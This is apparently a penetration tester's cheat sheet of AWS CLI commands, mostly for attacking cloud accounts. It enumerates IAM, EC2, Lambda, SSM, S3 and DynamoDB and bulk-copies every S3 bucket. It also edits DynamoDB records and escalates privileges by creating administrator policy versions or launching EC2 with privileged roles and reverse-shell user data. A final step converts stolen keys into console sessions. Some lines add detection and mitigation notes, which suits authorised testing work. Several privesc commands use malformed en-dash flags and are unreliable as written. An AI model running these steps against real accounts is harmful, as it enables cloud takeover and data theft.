AWS CLI
Install and add an access key:
# install the CLI, then store an access key id / secret (and default region) in the default profile
python3 -m pip install awscli
aws configure
# other useful tools
pip install awscli ansi2html detect-secrets boto3 principalmapper botocore defusedxml enum python_dateutil lxml signxml
Manual
Enum:
Users/Groups:
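# list every IAM user in the account
aws iam list-users
# show the user the current credentials belong to
aws iam get-user
# list access keys of the calling user (add --user-name to look at another user)
aws iam list-access-keys
# list all groups
aws iam list-groups
# list the members of one group; defaults to FullAdmins, override with GROUP_NAME=... on the command line
aws iam get-group --group-name "${GROUP_NAME:-FullAdmins}"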
Policies:
# enumerate every policy visible to the account (AWS-managed and customer-managed)
aws iam list-policies
# fetch one policy's metadata (the document itself lives in the default version)
aws iam get-policy --policy-arn <value>
# which users, groups and roles have this policy attached
aws iam list-entities-for-policy --policy-arn <value>
# show the account-wide password policy (length, rotation, reuse rules)
aws iam get-account-password-policy
Ec2:
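# list all instances: InstanceId, KeyName and the State object of each one.
# Uses the CLI's own JMESPath --query instead of jq, so no extra tool is needed
# (the original also lacked a space before the pipe).
aws ec2 describe-instances --region REGION --profile PROFILE \
  --query 'Reservations[].Instances[].{InstanceId:InstanceId,KeyName:KeyName,State:State}'
# list all keypairs
aws ec2 describe-key-pairs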
# import an existing keypair
aws ec2 import-key-pair --key-name keyname_test --public-key-material file:///id_rsa.pub
# push ssh keys
aws ec2-instance-connect send-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --zone us-west-2b --instance-os-user ec2-user --public-key file://my_key.pub
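# list all security groups
aws ec2 describe-security-groups
# Extract user data. The instance flag is --instance-id; UserData comes back
# base64-encoded, so pull just that field as text and decode it.
# (prints "None" and fails the decode when the instance has no user data)
aws ec2 get-launch-template-data --instance-id i-EXAMPLE
aws ec2 get-launch-template-data --instance-id i-EXAMPLE \
  --query 'LaunchTemplateData.UserData' --output text | base64 -d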
Lambda:
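# List lambda functions
aws lambda list-functions --region REGION --profile PROFILE
# get one function: Code.Location is a presigned URL for downloading its deployment package
# (placeholder typo fixed; region/profile placeholders match the command above)
aws lambda get-function --function-name "LAMBDA_NAME" --query 'Code.Location' --region REGION --profile PROFILE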
SSM:
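# list instances registered with SSM
aws ssm describe-instance-information --profile PROFILE --region REGION
# instance ids only: JMESPath + text output instead of grep/awk/sed, which break
# whenever the JSON formatting changes; tr turns the tab-separated list into lines
aws ssm describe-instance-information --profile PROFILE --region REGION \
  --query 'InstanceInformationList[].InstanceId' --output text | tr '\t' '\n'
# start an interactive session on one instance
aws ssm start-session --target InstanceID --region REGION --profile PROFILE
# connect to all, one after another. The id list is read on fd 3 rather than stdin:
# with "done < ssm_list.txt" the session plugin would inherit the file as its stdin
# and the session would not be interactive. Exit each session to move to the next.
aws ssm describe-instance-information --profile PROFILE --region REGION \
  --query 'InstanceInformationList[].InstanceId' --output text | tr '\t' '\n' > ssm_list.txt
while read -r id <&3; do
  aws ssm start-session --profile PROFILE --region REGION --target "$id"
done 3< ssm_list.txt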
S3:
S3Api:
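# list buckets, one name per line (text output instead of a chain of sed calls)
aws s3api list-buckets --query "Buckets[].Name" --output text | tr '\t' '\n' | tee s3.txt
## Public enumeration: does a bucket answer anonymous HTTPS/HTTP requests?
# Anything other than "Access Denied" (including NoSuchBucket or a region redirect)
# is reported as potential access, so confirm hits by hand.
# printf interprets the colour escapes (bash's echo does not), and each branch
# is a proper if/else - the original "{ echo ... }" groups were missing the ";"
# before "}" and only parse in zsh.
check_bucket() {
  local bucket=$1 label=$2 url=$3
  if curl -s "$url" | grep -q 'Access Denied'; then
    printf '\033[0;31m[-] %s %s Denied Access\033[0m\n' "$bucket" "$label"
  else
    printf '\033[32m[+] %s %s Potential access - check @ %s\033[0m\n' "$bucket" "$label" "$url"
  fi
}
while read -r bucket; do
  check_bucket "$bucket" HTTPS "https://$bucket.s3.amazonaws.com"
  check_bucket "$bucket" HTTP "http://$bucket.s3.amazonaws.com"
done < s3.txt
# raw anonymous responses, for reading the XML by eye
while read -r bucket; do curl -s "http://$bucket.s3.amazonaws.com"; done < s3.txt
## Authenticated enum: copy every bucket into the current directory, log per bucket
# (log goes to <bucket>.log so it cannot collide with a downloaded object named <bucket>)
while read -r bucket; do aws s3 cp "s3://$bucket" . --recursive | tee "$bucket.log"; done < s3.txt
## Automate: one directory per bucket
# tee must not write to "$bucket" itself - that is the directory just created
while read -r bucket; do
  mkdir -p "$bucket" && aws s3 cp "s3://$bucket" "$bucket" --recursive | tee "$bucket.log"
done < s3.txt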
DynamoDB:
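# list tables:
aws dynamodb list-tables
# table name is a parameter now; defaults to the original example
TABLE="${TABLE:-blog-users}"
# get table data (scan returns every item; the CLI paginates the 1 MB pages for you)
aws dynamodb scan --table-name "$TABLE"
# update - put an exported item into a file, edit the wanted attribute, then write it back
aws dynamodb put-item --table-name "$TABLE" --item file://user_item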
RDS:
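# show RDS instances; region defaults to us-east-1, override with REGION=...
aws rds describe-db-instances --region "${REGION:-us-east-1}"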
Privesc:
Policy based:
# Create new default policy
# Detection: CloudTrail event CreatePolicyVersion with setAsDefault=true on a policy
# attached to the calling principal. Mitigation: do not grant iam:CreatePolicyVersion
# outside administrative roles.
aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
# Set new default policy to existing version - Where "v2" is the policy version with the most privileges available.
# Detection: CloudTrail event SetDefaultPolicyVersion. Mitigation: restrict
# iam:SetDefaultPolicyVersion the same way, and prune old privileged versions.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
# Create Ec2 with existing policy
# Requires iam:PassRole on the profile's role. Detection: RunInstances with an
# iamInstanceProfile in requestParameters. Mitigation: scope iam:PassRole to the
# specific role ARNs and add the iam:PassedToService=ec2.amazonaws.com condition.
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
# or, with user data in place of an SSH key (same detection and mitigation as above)
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh
Escalate:
Tools:
Upgrade to console access:
git clone https://github.com/NetSPI/aws_consoler
# -a takes the access key id, -s the secret access key of the identity to open a console session for
aws_consoler -v -a AKIA -s SECRET